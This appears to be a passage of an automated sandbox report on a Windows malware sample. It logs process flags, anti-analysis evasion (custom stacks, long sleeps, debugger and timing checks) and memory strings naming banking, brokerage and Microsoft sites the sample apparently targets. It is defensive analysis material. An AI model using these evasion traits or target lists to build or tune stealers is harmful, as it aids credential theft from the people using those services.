                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FF90818D324
                Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FF90818D7E4
                Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FF90818D944
                Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FF90818D504
                Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FF90818D544
                Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FF90818D1E4
                Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FF908190154
                Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FF90818DA44
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: D90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 27D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2570000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 4DE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 5DE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 5F10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 6F10000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D4096E rdtsc 5_2_02D4096E
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3874Jump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeWindow / User API: threadDelayed 9806Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\runonce.exeAPI coverage: 2.6 %
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7608Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7464Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7636Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exe TID: 8100Thread sleep count: 166 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\runonce.exe TID: 8100Thread sleep time: -332000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exe TID: 8100Thread sleep count: 9806 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\runonce.exe TID: 8100Thread sleep time: -19612000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\UfdujJffCftgkWIRTClUOplhWXIVwQwqHslmKQeprsvFwt\y85te3vqfc6QGAKyw78l.exe TID: 3648Thread sleep time: -35000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\runonce.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_0326C8D0 FindFirstFileW,FindNextFileW,FindClose,10_2_0326C8D0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                Source: 6511-iOQ--.10.drBinary or memory string: dev.azure.comVMware20,11696497155j
                Source: 6511-iOQ--.10.drBinary or memory string: global block list test formVMware20,11696497155
                Source: 6511-iOQ--.10.drBinary or memory string: turbotax.intuit.comVMware20,11696497155t
                Source: runonce.exe, 0000000A.00000002.2608327762.000000000365A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla(I
                Source: 6511-iOQ--.10.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                Source: 6511-iOQ--.10.drBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
                Source: 6511-iOQ--.10.drBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                Source: 6511-iOQ--.10.drBinary or memory string: tasks.office.comVMware20,11696497155o
                Source: 6511-iOQ--.10.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                Source: 6511-iOQ--.10.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                Source: firefox.exe, 0000000E.00000002.2128057788.00000171EB59D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 6511-iOQ--.10.drBinary or memory string: bankofamerica.comVMware20,11696497155x
                Source: 6511-iOQ--.10.drBinary or memory string: ms.portal.azure.comVMware20,11696497155
                Source: 6511-iOQ--.10.drBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                Source: 6511-iOQ--.10.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                Source: 6511-iOQ--.10.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                Source: 6511-iOQ--.10.drBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
                Source: 6511-iOQ--.10.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
                Source: 6511-iOQ--.10.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                Source: 6511-iOQ--.10.drBinary or memory string: interactivebrokers.comVMware20,11696497155
                Source: 6511-iOQ--.10.drBinary or memory string: AMC password management pageVMware20,11696497155
                Source: 6511-iOQ--.10.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                Source: 6511-iOQ--.10.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
                Source: 6511-iOQ--.10.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                Source: 6511-iOQ--.10.drBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
                Source: y85te3vqfc6QGAKyw78l.exe, 0000000D.00000002.2612191080.0000000001219000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllG
                Source: 6511-iOQ--.10.drBinary or memory string: discord.comVMware20,11696497155f
                Source: 6511-iOQ--.10.drBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
                Source: 6511-iOQ--.10.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                Source: 6511-iOQ--.10.drBinary or memory string: outlook.office365.comVMware20,11696497155t
                Source: 6511-iOQ--.10.drBinary or memory string: outlook.office.comVMware20,11696497155s
                Source: 6511-iOQ--.10.drBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
                Source: 6511-iOQ--.10.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                Source: 6511-iOQ--.10.drBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D4096E rdtsc 5_2_02D4096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00417A93 LdrLoadDll,5_2_00417A93
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DD62D6 mov eax, dword ptr fs:[00000030h]5_2_02DD62D6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D0A2C3 mov eax, dword ptr fs:[00000030h]5_2_02D0A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D0A2C3 mov eax, dword ptr fs:[00000030h]5_2_02D0A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D0A2C3 mov eax, dword ptr fs:[00000030h]5_2_02D0A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D0A2C3 mov eax, dword ptr fs:[00000030h]5_2_02D0A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D0A2C3 mov eax, dword ptr fs:[00000030h]5_2_02D0A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D102E1 mov eax, dword ptr fs:[00000030h]5_2_02D102E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D102E1 mov eax, dword ptr fs:[00000030h]5_2_02D102E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D102E1 mov eax, dword ptr fs:[00000030h]5_2_02D102E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3E284 mov eax, dword ptr fs:[00000030h]5_2_02D3E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D3E284 mov eax, dword ptr fs:[00000030h]5_2_02D3E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D80283 mov eax, dword ptr fs:[00000030h]5_2_02D80283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D80283 mov eax, dword ptr fs:[00000030h]5_2_02D80283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D80283 mov eax, dword ptr fs:[00000030h]5_2_02D80283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D102A0 mov eax, dword ptr fs:[00000030h]5_2_02D102A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D102A0 mov eax, dword ptr fs:[00000030h]5_2_02D102A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D962A0 mov eax, dword ptr fs:[00000030h]5_2_02D962A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D962A0 mov ecx, dword ptr fs:[00000030h]5_2_02D962A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D962A0 mov eax, dword ptr fs:[00000030h]5_2_02D962A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D962A0 mov eax, dword ptr fs:[00000030h]5_2_02D962A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D962A0 mov eax, dword ptr fs:[00000030h]5_2_02D962A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D962A0 mov eax, dword ptr fs:[00000030h]5_2_02D962A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DD625D mov eax, dword ptr fs:[00000030h]5_2_02DD625D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D06259 mov eax, dword ptr fs:[00000030h]5_2_02D06259
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DBA250 mov eax, dword ptr fs:[00000030h]5_2_02DBA250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DBA250 mov eax, dword ptr fs:[00000030h]5_2_02DBA250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D88243 mov eax, dword ptr fs:[00000030h]5_2_02D88243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D88243 mov ecx, dword ptr fs:[00000030h]5_2_02D88243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02CFA250 mov eax, dword ptr fs:[00000030h]5_2_02CFA250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02CF826B mov eax, dword ptr fs:[00000030h]5_2_02CF826B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DB0274 mov eax, dword ptr fs:[00000030h]5_2_02DB0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DB0274 mov eax, dword ptr fs:[00000030h]5_2_02DB0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DB0274 mov eax, dword ptr fs:[00000030h]5_2_02DB0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DB0274 mov eax, dword ptr fs:[00000030h]5_2_02DB0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DB0274 mov eax, dword ptr fs:[00000030h]5_2_02DB0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DB0274 mov eax, dword ptr fs:[00000030h]5_2_02DB0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DB0274 mov eax, dword ptr fs:[00000030h]5_2_02DB0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DB0274 mov eax, dword ptr fs:[00000030h]5_2_02DB0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DB0274 mov eax, dword ptr fs:[00000030h]5_2_02DB0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DB0274 mov eax, dword ptr fs:[00000030h]5_2_02DB0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DB0274 mov eax, dword ptr fs:[00000030h]5_2_02DB0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02DB0274 mov eax, dword ptr fs:[00000030h]5_2_02DB0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D04260 mov eax, dword ptr fs:[00000030h]5_2_02D04260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D04260 mov eax, dword ptr fs:[00000030h]5_2_02D04260
